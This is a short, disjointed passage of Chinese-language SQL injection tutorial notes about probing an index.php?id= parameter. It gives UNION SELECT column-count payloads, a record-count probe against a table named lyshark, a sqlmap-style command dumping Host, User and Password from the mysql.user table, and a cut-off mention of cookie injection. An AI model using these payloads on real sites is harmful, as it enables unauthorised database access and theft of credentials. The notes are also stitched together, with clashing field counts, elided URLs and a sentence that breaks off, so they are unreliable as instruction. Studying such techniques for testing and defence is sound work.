在上面的基础上,我们增加一个字段,查询1,2,3时页面显示正常,说明表结构是3个字段的.
index.php?...上面的结果,说明字段数就是3,输入的数大于或小于字段数时都会报错,而使用union select null,null,null替换1,2,3是相同的效果用数字也可以.
index.php?...id=1 and (select count(*) from lyshark) >=3 #-- // 返回表中记录数
用户名猜测: 通过正则符号也可使完成多指定用户的探测,其他函数用法相同.
index.php...id=1' and 1=1 union select 1,2,3,4 --+
b.在上面的基础上,我们增加一个字段,查询1,2,3,4,5时页面显示正常,说明表结构是5个字段的.
index.php?...id=1" -D "mysql" -T "user" -C "Host,User,Password" --dump
Cookie注入: 当level>=2时,使用cookie注入,level >=3 使用